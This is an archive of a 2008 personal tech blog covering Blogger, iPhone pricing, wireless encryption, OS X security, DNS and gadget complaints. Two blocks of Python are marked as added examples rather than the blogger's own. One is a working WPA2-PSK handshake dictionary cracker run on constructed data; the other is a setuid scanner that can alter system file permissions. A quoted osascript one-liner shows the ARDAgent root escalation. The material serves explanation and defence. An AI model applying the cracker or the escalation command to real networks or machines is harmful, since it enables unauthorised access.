Friday, July 04, 2008

Blogger gets some real updates and Google moves away from Data Lock

There's still no update to the extremely antiquated BlogThis! blogger bookmarklet, but Google is, at long, long last, putting some energy into Blogger.

To see the new environment you need to be using FF 3 or Safari 3 (some versions of IE too) and running Blogger in draft. Today Safari 3 is showing the old editor, so things will be fluid.

The current big news is that Safari 3 is supposed to have full support -- which means it's a more viable browser for my use. The big future feature is promised FTP file upload and enclosures. Uploaded images are stored only in Picasa web albums.

I've run into these bugs and lost capabilities so far:
  1. Items authored in the BlogThis! window are formatted incorrectly when edited in the new editor.
  2. Items authored using ScribeFire for FF are formatted incorrectly in the new editor and cannot be fixed easily. (SF has just been updated, so this may change.)
  3. Lists don't work fully. So if you save an item and try to add to a list, it inserts the row without a list tag. (known issue)
  4. The Save Now button closes the draft, so you have to reopen it (known issue)
  5. No formatting buttons in HTML mode (they will return soon)
Some highlights on the editor:
  1. The new post editor: Dynamic image resize, drag and drop location. Changes to the HTML editor that seem of unclear value to me (solving a non-existent problem?). Full Safari 3 support? (But today 3.1.2 gave me the old editor, so they may be tweaking something).
  2. How to report HTML bugs with the new post editor: Add a comment to this blog post? Seems that won't scale.
There are also some very nice big new features; the backup and the ability to effectively merge blogs seem awfully big to me (note that this particular page has links to pages that are "saved in draft" and thus don't appear as regular post pages -- a curious choice):
  1. Star ratings. Readers only, personally I'd like to be able to rate my own posts too -- differentiate the ones I think are more interesting.
  2. Import / export of blogs. Back up all of your posts and comments to one Atom XML file on your computer, and import your posts from one blog to another.
  3. Embedded comment form. By incredibly popular demand, we’ve brought the comment form to your blog’s post pages, with support for Google Account and OpenID authentication.
  4. New post editor. We’ve completely revised the post editor, bringing in drag-and-drop image placement and better HTML handling.
Safari 3 support in the new editor is great, but for me the really big deal is import/export. Per blogger:
  1. Merge two or more blogs into one. Take the exported posts and comments from one blog and import them into another one.
  2. Move individual posts from blog to blog. After importing, select just a set of posts to publish and publish them with one click.
  3. Back up your blog to your own storage. You can keep your words safe and under your control in case anything happens to your blog, or us, or if you want to remove them from the Internet.
  4. Move your blog somewhere else. Our export format is standard Atom XML. We hope to see other blogging providers extend their Atom support to include import and export. And, if you decide to come back to Blogger, importing your export file will get you back up and running in seconds.
The last is big. Google claimed over a year ago that they were going to make user data portable (see also). I've been very skeptical, and it's taken them a heck of a long time to do anything real. Now I'm willing to give them some time to show genuine commitment -- such as the ability to move Picasa albums to other services.

Altogether this is the best Blogger news since it became a somewhat reliable service about a year ago. Maybe Google can do product commitment after all.

Now if Google would only fix BlogThis!

Thursday, July 03, 2008

iPhone 2.0 is MUCH more expensive than iPhone 1.0 for current AT&T customers

I think Apple is still boasting of how affordable the new iPhone is.

This marketing swill is so evil.

For a current AT&T customer the cost has not fallen, it's gone UP a lot -- an additional $360 over two years. The increase is so large because the previous iPhone pricing was a great deal for a current AT&T customer. Current AT&T customers could buy an iPhone for the same cost as a new AT&T customer, and that's unheard of in the US mobile marketplace.

AT&T has now moved iPhone pricing in line with other "smartphone" pricing (which must make BlackBerry happier).

I've updated a prior post, here are some key excerpts ...

The Cost of the iPhone: More Per Month for Data - Bits - Technology - New York Times Blog

... According to a press release from AT&T, the carrier will no longer give a portion of monthly usage fees to Apple. Instead carriers will pay Apple a subsidy for each phone sold, in order to bring the price from $399 down to $199 for the 8 Gigabyte model. The company did not specify the amount of the subsidy. Subsidies of $200 to $300 are common in the industry.

What is more, consumers will now pay $30 a month for unlimited data service from AT&T, compared to $20 under the plan introduced last year. So even though the phone will now cost $200, consumers will be out more cash at the end of a two-year contract compared to the previous deal.

Tidbits: $160 more expensive ...

...SMS messages are no longer included in the data plan either, so you'll have to pay extra for them. Previously, the data plan included 200 SMS messages per month. AT&T's Messaging 200 plan, which includes 200 SMS messages, costs $5 per month, so it would seem likely that the iPhone 3G's SMS plan would be similar...

Ok, so for a new AT&T customer buying an iPhone the price has gone up by $160 over two years. Things are worse, however, for a current AT&T customer.

Current AT&T customers don't get the $200 discount on new phones. So for a current AT&T customer, the two year cost of a 16GB iPhone hasn't increased by $160, it's increased by $360.

A $360 increase over a two year ownership period is a substantial increase.

I spit in the general direction of Apple marketing.

The frailty of wireless encryption

WEP I knew was almost worthless. This is the most concise description of WPA limitations I’ve seen …
Coding Horror: Open Wireless and the Illusion of Security

… here are a few guidelines.
  1. WEP = Worthless Encryption Protocol
    WEP, the original encryption protocol for wireless networks, is so fundamentally flawed and so deeply compromised it should arguably be removed from the firmware of every wireless router in the world. It's possible to crack WEP in under a minute on any vaguely modern laptop. If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
  2. WPA requires a very strong password
    The common "personal" (PSK) variant of WPA is quite vulnerable to brute force dictionary attacks. It only takes a trivial amount of wireless sniffing to obtain enough data to attack your WPA password offline -- which means an unlimited amount of computing power could potentially be marshaled against your password. While brute force attacks are still for dummies, most people are, statistically speaking, dummies. They rarely pick good passwords. If ever there was a time to take my advice on using long passphrases, this is it. Experts recommend you shoot for a 33 character passphrase.
In the end, perhaps wireless security is more of a deterrent than anything else, another element of defense in depth. It's important to consider the underlying message Bruce was sending: if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.

You have the illusion of security.
The implication is that other versions of WPA (WPA-2?) are less vulnerable. In practice, as Schneier would probably say, it comes down to the value of what you’re trying to protect vs. the cost of the attack. Security is not a binary thing, it’s a spectrum. Relative, not absolute.

I suspect a good 20 character random password would suffice for most of us.

Update: A comment includes a nice link to a web site that helps create memorable passphrases.
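To make the offline attack in the quoted text concrete, here is an added example, not code from the original post or from Coding Horror. It reproduces the WPA2-PSK key schedule (PMK by PBKDF2-HMAC-SHA1 over the SSID, PTK by the 802.11i PRF-512, EAPOL MIC by truncated HMAC-SHA1 for key descriptor version 2) and runs a dictionary against a four-way handshake. The SSID, MAC addresses, nonces, EAPOL frame body and word list are all constructed in-process; the handshake is built with a known passphrase so the attack can be run offline. The 4096-round PBKDF2 is the only per-guess cost, which is exactly why passphrase length, not the protocol, decides the outcome.

```python
# Added example: offline dictionary attack against a constructed WPA2-PSK
# four-way handshake. Nothing here comes from the quoted article.
import hashlib
import hmac

SSID = "home-wifi"  # constructed SSID


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i), 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK over Min/Max of the two MACs and the two nonces (byte-wise ordering)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2: HMAC-SHA1 with the KCK (PTK[0:16]), truncated to 16 bytes."""
    return hmac.new(ptk[:16], eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for what a sniffer captures: addresses, nonces,
    the second EAPOL-Key frame with its MIC field zeroed, and the MIC it carried."""
    ap_mac = bytes.fromhex("00112233aabb")   # constructed
    sta_mac = bytes.fromhex("66778899ccdd")  # constructed
    anonce = bytes(range(32))                # constructed
    snonce = bytes(range(32, 64))            # constructed
    eapol = bytes.fromhex("0203007502010a00") + bytes(109)  # constructed frame body
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol,
            "mic": eapol_mic(ptk, eapol)}


def crack_psk(hs: dict, wordlist):
    """Return the first candidate whose derived MIC matches the captured one, else None.
    Each guess costs one PBKDF2 run plus a few HMACs; the network is never touched."""
    for cand in wordlist:
        pmk = pmk_from_passphrase(cand, hs["ssid"])
        ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk, hs["eapol"]), hs["mic"]):
            return cand
    return None


WORDLIST = ["letmein", "qwerty", "password123", "iloveyou"]  # constructed word list

if __name__ == "__main__":
    weak = make_handshake("password123", SSID)
    strong = make_handshake("vB7!qL2#xR9mZp4wKf8s", SSID)  # 20 random characters
    print("weak   ->", crack_psk(weak, WORDLIST))
    print("strong ->", crack_psk(strong, WORDLIST))
```

The weak handshake falls to the fourth guess; the 20-character random passphrase survives only because it is in no list, which is the whole argument of the quoted text: once the handshake is captured, the defender's remaining protection is how many PBKDF2 runs the attacker must pay for.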

Tuesday, July 01, 2008

Best review of the OS X ARDA root escalation vulnerability

I might follow the advice outlined here, though I may simply avoid installing software until Apple provides a fix. It is a bigger problem than I'd assumed when I first saw the Slashdot story:
TidBITS Safe Computing: How to Protect Yourself from the New Mac OS X Trojans

... Simply running the AppleScript command

osascript -e 'tell app "ARDAgent" to do shell script "reallybadstuff"'

runs "reallybadstuff" as root, without asking you for your password....

... the attacker exploits a vulnerability that gives them access to your user account, then he uses privilege escalation to take over your system as root, often installing additional malicious software. These combined attacks are common, although we don't see them often on Macs (in fact, I've never seen one on Mac OS X). The attacker will use something like a Web browser vulnerability to get his foot in the door, followed by the privilege escalation...

... The first major Trojan to leverage the ARDAgent vulnerability is called "PokerStealer" (identified by antivirus vendor Intego). Rather than using some sort of attack to get on your system, it pretends to be a poker game. When it's run, it uses the ARDAgent vulnerability to escalate its rights (without asking for your password) and installs malicious software like a keystroke capture program.

A more serious problem is that, as reported by Brian Krebs at the Washington Post, some bad guys developed a tool to bundle a package of malicious software into any downloadable Mac application. It uses the ARDAgent vulnerability to run these pieces without your interaction, like PokerStealer. The program needs to run only once, then it embeds itself in your system. Interestingly enough, Krebs reports that this tool was in development since May 2008. We can expect the bad guys to use all sorts of social engineering tricks (like writing little games) to get us to run their software on our systems.

To protect yourself, if you don't use (or plan on using) Apple Remote Desktop (which is different from Screen Sharing), you can go to /System/Library/CoreServices/RemoteManagement/ in the Finder, copy ARDAgent.app to your Desktop, right-click and compress it, and move the file someplace like your Documents folder. Then delete the original file. That way you just need to unzip and reinstall the file if you ever need ARDAgent down the road...
Following these preventive measures may mess up future Apple updates however.

The most important security measure for most OS X users is not to run as an admin user -- save the admin account for admin tasks. This security defect bypasses that protection.
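The reason the quoted one-liner gets root is that the ARDAgent executable shipped setuid root and honoured "do shell script" Apple Events, so the check a practitioner wants before and after any mitigation is whether that bit is still set. The scanner below is an added example, not code from the TidBITS article or the original post: it reports setuid/setgid files under a directory with their owner and can clear the bit in place, which is reversible with chmod u+s and leaves the bundle where Apple's updater expects it. The app path is the one quoted above; the Contents/MacOS/ARDAgent executable name inside the bundle is an assumption, and the script does nothing destructive unless clear_setuid is called.

```python
# Added example: audit a directory tree for setuid/setgid executables and
# optionally drop the bit. Not code from the quoted article.
import os
import pwd
import stat

# Path quoted on the page, plus the assumed executable name inside the bundle.
ARDAGENT_BINARY = ("/System/Library/CoreServices/RemoteManagement/"
                   "ARDAgent.app/Contents/MacOS/ARDAgent")


def setuid_info(path):
    """Return (setuid, setgid, owner) for a regular file, (False, False, None)
    for other inode types, or None if the path does not exist."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    if not stat.S_ISREG(st.st_mode):
        return (False, False, None)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    return (bool(st.st_mode & stat.S_ISUID), bool(st.st_mode & stat.S_ISGID), owner)


def find_privileged(root):
    """Walk root and list (path, owner, 'setuid'|'setgid') for files carrying either bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            info = setuid_info(p)
            if info and (info[0] or info[1]):
                hits.append((p, info[2], "setuid" if info[0] else "setgid"))
    return hits


def clear_setuid(path):
    """Drop setuid and setgid; the file stays executable and in place."""
    st = os.lstat(path)
    os.chmod(path, stat.S_IMODE(st.st_mode) & ~(stat.S_ISUID | stat.S_ISGID))
    return setuid_info(path)


if __name__ == "__main__":
    info = setuid_info(ARDAGENT_BINARY)
    if info is None:
        print("ARDAgent not present on this system")
    else:
        print("ARDAgent setuid=%s setgid=%s owner=%s" % info)
    for p, owner, kind in find_privileged("/System/Library/CoreServices"):
        print(kind, owner, p)
```

Run as-is it only reports; a setuid root hit on the ARDAgent executable means the escalation path is still open on that machine.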

Monday, June 30, 2008

Why Blackberry deserves to die

Tolkien wrote: "Many that live deserve death. Some that die deserve life."

So I'm not saying that the Blackberry will die, just that it doesn't deserve to live.

It's not just the inexcusable memory capacity limitations. It's not even the astounding lack of imagination in the software environment. No, the ultimate offense is this:
Passwords are masked on entry. Even on the Blackberry Pearl -- with its predictive text matching.
I realize very few products are as smart as OS X, which allows users to optionally unmask passwords. I could forgive Blackberry for omitting this feature if the Pearl had a conventional keyboard. It doesn't of course, and, speaking only for myself, text prediction does not work on my passwords.

The brief single character display (not available for numeric entry) is not enough.

This is one of the stupidest things I've come across. I've had plenty of time to investigate my wife's Pearl while traveling cross-country flat on my back, and my relatively positive initial impressions have dissolved. It really deserves to perish. If the iPhone 2.0 is half-decent I'll be selling a Pearl cheap as soon as ePocrates will run on the iPhone.

Saturday, June 28, 2008

Open DNS saves my day

OpenDNS has some issues:

[Gruber] I linked to OpenDNS last week, praising their service after Comcast’s own DNS servers had failed me for the last time. It ends up though that OpenDNS is a polarizing service — they’re both praised and scorned. One of the reasons they’re scorned is that they redirect requests to www.google.com to their own internal server before forwarding the request along to Google’s www.l.google.com. They also do wildcard matching for unregistered domain names, a move most DNS experts consider a no-no. They’re open about these “features” (e.g. here’s their explanation for the Google redirection), but I tend to take the side that any sort of “DNS+” service is worse than just plain DNS.

I think it’s worth keeping OpenDNS on deck for use in a pinch if your regular DNS server conks out, but I can’t recommend them for primary use.

On the other hand, OpenDNS saved me today. The resort we're staying at has very marginal net access, and today I could reach Google and Microsoft but not much else. I figured their DNS was down. From a Google Cache page I retrieved the OpenDNS addresses:
OpenDNS > Get Started > Enable OpenDNS

Our nameservers are 208.67.222.222 and 208.67.220.220.
Bingo, that worked. Now everyone at the resort is switching.

I may start using OpenDNS - especially when traveling. The filtering options are appealing for our home use too, so I may well sign up and pay them. More on that after I review Gruber's comments in context.

Sunday, June 22, 2008

iTunes for OS X is not a Mac application

There are many great features of iTunes. The query implementation, including the ability to nest queries, is superb.

Against this must be set the fact that iTunes is not a Mac application. If it were produced by anyone but Apple we'd all dump on it.

iTunes does not respect the Dock, for heavens sake! It ignores it when sizing windows. Even Firefox 3 respects the Dock (a very nice improvement over FF 2 in that regard, among many others).

Click the green plus icon on any Mac app and the primary window sizes to the "largest size consistent with good screen practices". Click it on iTunes/OS X and you get the mini-player.

That's just gross.

Firefox 3 is a vastly better OS X citizen than iTunes.

Isn't there anyone in Cupertino with a modicum of shame?

Sunday, June 15, 2008

I get video output from my (old) video iPod. Finally.

Greed has a different meaning when applied to a corporation.

By human standards corporations are supposed to be greedy. "Greed is Good".

But there's still such a thing as a Corporate Greed. That's when a corporation takes bites that generate near term returns, but make customers bitter and lead to longer term losses.

Apple does that on occasion, most recently with the way they sell their current iPod video out connector. More on that in a moment, but first ...

I have an old fifth generation video iPod [1]. I've never done much with the video -- the few times I've tried to output to a TV I failed. We're heading out for a long road trip though, and I've loaded up the iPod with TV shows. Time to see if I can get video output working. A good Father's Day project.

The output will go to an incredibly cheap very low end 2 panel auto DVD player marketed using a recycled "Kawasaki" brand [2] with a mini-jack AV input.

It's probably been 3 years since I failed to get video out of the iPod. I'd forgotten ...

  • you can get video output through the earphone jack as well as the dock connector
  • there's a settings option hidden in the video menu that controls which connector gets the video stream. I use the "ask" option.

Both options require proprietary Apple video connectors [3]. Years ago, however, people discovered you could use a standard AV camcorder with the fifth generation (not current!) iPods if you swapped the output cables ...

O'Reilly Network -- Getting the Video out of Your New iPod--for Cheap! (Derrick Story, Nov 2005)

...In order to make your TV play back the iPod signal, you've got to redirect the outputs. You can't just plug the yellow RCA plug into the yellow RCA jack and the red into the red or the white into the white. No. Those geniuses at Apple send the video signal over the red RCA output. (Normally it arrives on yellow.) The sound comes through the white and yellow plugs.

I ended up going to an Apple store and testing this on iPod after iPod. They all have this quirk. It was intentional. But hey, it's proprietary. Woohoo. So here's what you have to do:

  • Plug the red RCA plug into your TV's yellow RCA jack.
  • Plug the yellow RCA plug into your TV's white RCA jack.
  • Plug the white RCA plug into your TV's red RCA jack.

Except that never worked for me. Today I gave it another go, as the alternative was a trip to the Apple Store to buy the iPhone-compatible $50 DRMd, counterfeit-preventing, Apple-only dock connector video out cable set [4].

I tried 3 mini-jack to component cables, first against my TV's component inputs.

  • white cable that came with my original iBook. It has the swapped cables Story describes, but it didn't work. I think it's a slightly different form of proprietary. It works with my camcorder if I swap its outputs!
  • black camcorder cable: nope, just got hash
  • another camcorder cable: worked perfectly.

The "Kawasaki" has a mini-AV input, so I used a short male-to-mini-AV adapter to plug in there, mating the connectors as per Story's description. Works very well, with a lovely image. If you turn it around, however, it doesn't work. Since it's a mini-AV to mini-AV cable it should work in either "direction", but this hacked mini-mini cable is one directional.

My guess is that Apple's variation isn't just a cable swap, but differs slightly in connector layout as well. This may not be a simple attempt to make a steep margin on cables -- though Apple is certainly not above that. The analog output jack on the fifth generation iPod, like the analog output on the iBook, is serving two purposes. It has to work perfectly with standard audio output, but it also has to support a video channel. This is different from a camcorder output, which need not support a stereo audio cable.

So Apple's analog output from this device may be justifiably atypical. Even so, we know some AV cables work - albeit with swapped outputs. I've run into less defensible variations of this elsewhere, such as converters that claim to allow 3.5mm stereo headsets to work with "standard" 2.5mm phone earset (microphone) connectors.

If you're trying to get video from the 5G iPod headphone jack start with a good quality AV cable and test at the store if possible.

Of course if you have a modern iPod/iPhone/iTouch you're out of luck, you need to buy Apple's $50 connector kit.[4]

[1] You can figure out which iPod you have with this rather complex Apple support document.

[2] I can spend $2000 for Apple iMacs with heat problems and screens that last two years, and $200 for something from an anonymous Chinese factory that lasts forever and just works. Why?

[3] That's not the greedy part.

[4] Yep, that's the Corporate Class Greed. The kit includes a USB charger -- I have maybe six of those. If Apple had sold the cable for $25 without the charger I'd say they were greedy by human standards, but within corporate norms. I need to buy one of these when I get iPhone 2, I'll try to find a used one first or hope some counterfeiter has broken Apple's anti-counterfeiting scheme. Of course if Apple eliminated the charger and dropped the price to $25 I'd buy it from them.

Update 6/15/08

Apple is greedy with the way they package their proprietary AV output connector, but there is some justification for their proprietary approach.

For example:

In this world of seemingly standard audio-video 3.5mm and 2.5 mm mini-jack output my sense is the only reliable standard is the 3.5 mm stereo output connector. Everything else is more or less proprietary.

Saturday, June 14, 2008

Burn: The best optical disk burn solution for OS X.

I love Burn.

I've tried other commercial alternatives, particularly trying to get rid of the invisible .DS_Store and other dot files OS X can put on CDs.

They flopped. I was back to using the built-in burning tool, but it doesn't let me readily enforce the lowest common denominator (PC Joliet) standard, and I'm not sure it fully excludes the treacherous dot files.

Today though, my OS X gave me the ridiculous 0x8002006D error message during a burn. That means something is wrong. Helpful.

I fired up Burn for the first time. Simple. Lets me set PC Joliet easily. Shows dot files so I can remove them. It also showed the error, but said my CD burner couldn't calibrate. That's really helpful, it suggests a hardware problem. I blew in some compressed air and used a different CD and it completed the burn.

Great app. Open source and free. If they provide something other than PayPal for donations I'll send money.

As for the burner -- well, this is a G5 iMac. Those machines should never have been made. Fantastic heat problems, especially with the buggy hardware control software Apple used for the first year or two of the G5 iMac life. I suspect the DVD is another victim of too much heat for too long -- this machine is heading for the scrap heap at age 2.7 years. Not happy.

I'll try more CD cleaning methods of course. The compressed air jet was a quickie.

Update 6/15/08: Rich T says Simply Burns is also very well done.

Friday, June 13, 2008

Another Google product bites the dust. That's good.

This is probably the third or fourth Google app I've used that's been quietly discontinued or effectively abandoned.
Google Browser Sync To Be Discontinued

...Google Browser Sync is a Firefox extension that synchronizes your bookmarks, web history, browser sessions and passwords across multiple computers by temporarily saving them to Google's servers. Unfortunately, this was the project of a small team at Google and it's no longer maintained...
I was thinking yesterday that Google Browser Sync was due to be abandoned. I'm getting psychic.

I'm glad they're at least officially shutting it down.

Google has been great at starting things, lousy at finishing them. They need to cut way back on new initiatives until they decide what they're going to be serious about, then fund maintenance properly. They also have to start recruiting people who like doing software fit, finish, and maintenance, and lay off hiring inventive types for a year or two.

For example -- either fix Google Calendar Outlook sync or abandon it.

I think all Google customers have a long list of apps that need attention (BlogThis!?). One cheer for a sign that Google knows they have a problem.

Cisco VPN Client for 10.5.3

Cisco VPN Client 4.9.01.0100 works for 10.4 and later, including 10.5.

It can be hard to find Cisco VPN client downloads, Andrew got this one for me.

Update: I couldn't get the image to download fully, and now it's offline. Comments tell us Cisco's distribution policy has not changed; this was an unauthorized image and it's probably been removed.
I was able to download an image through my university account. It took 3 tries, I kept finding older versions on various U servers. The official site (UMN authentication required) had the version I needed: Cisco VPN Client 4.9.01.0100

I think for most people that's the best way to get an updated VPN Client -- find someone with access to an university account and ask them to get the client. Just be sure they know what the latest version is! I suspect many universities have multiple distribution sites.

Outlook 2003 treachery: revising recurrences wipes appointment data

I’m a hard core Outlook user.

I’m not proud of this. I wish Ecco Professional had survived, or even Agenda.

Still, it has some brilliant moments – especially when Outlook 2003 is combined with Windows Search (formerly Windows Desktop Search).

But.

Against good design, like the custom views (too bad the sort category view bug took ten years to fix!), must be set the real nasties. Like one I just fully understood today.

If you change the pattern of a recurring appointment, you wipe all prior exceptions. That’s fine, but the “exceptions” are any appointment that has attachments, agenda items, category tags, etc.

Want to go back and look at a past agenda? Forget it.

Maybe you’ve attached attributes to appointments and keywords so the appointment record can serve as a lookup and index to printed notes?

Gone. Vaporized. All of it.

This is just plain evil.

Thursday, June 12, 2008

Reduce SMS texting spam to cell phones

Cell phone spam costs recipients money – thanks to the insane charges carriers apply to text messages.

Pogue has some great tips - How to Block Cellphone Spam. The best at the moment is to change your SMS ID to an alias; spammers don’t bother to guess those and probably can’t process them with available software.

Clearly we’ll need better solutions though …

Wednesday, June 11, 2008

How to decide software is worth testing

I'm not that happy with Google's free web album plug-in for iPhoto, so I figured I'd try a commercial alternative.

If it passed a simple test.

The test?

It had to be easy to find the uninstall directions:
iPhoto to Picasa Web Albums F.A.Q. - Products | ubermind

How can I remove this plug-in from my system?
iPhoto to Picasa Web Albums can be removed by deleting the plug-in file located at:

~/Library/Application Support/iPhoto/Plugins/
iPhotoToPicasaWebAlbums.iPhotoExporter

(~ represents your home directory.)"
Not too hard, so I'll try it out.

This is a very good screening test for all OS X software ...

Update: 6/11/08

Testing concluded, software rejected because:
  1. Licensing is by license server. So I can't backup my license, if their server goes down I can't recover it, etc. That's an immediately fatal flaw.
  2. It's very, very, very slow to browse a large collection of albums. Something is broken, scrolling was awful.
  3. It doesn't add much to Google's free uploader. In particular, there's no option to combine titles and comments to fit Picasa's single title field.

Tuesday, June 10, 2008

iPhoto '08: Grayscale images with color profiles appear black and inverted

I scanned old photos as 16 bit gray scale with Epson Scan on my V700.

They looked fine in Preview, but in iPhoto '08 (most recent) they had black previews and oddly inverted and faint views.

This has been a problem since version 5.0.4: iPhoto 5.0.4 or later: Grayscale images appear inverted.

The scanner inserts a color profile, and they're not color images. iPhoto gets confused.

Preview doesn't.

One would think that over 3 versions Apple would have come up with better iPhoto behavior.

I removed the color profiles using the suggested AppleScript (see link) -- one at a time.

That worked. I'm sure there's a faster solution.

Very annoying, and it's only thanks to Google that it wasn't very aggravating.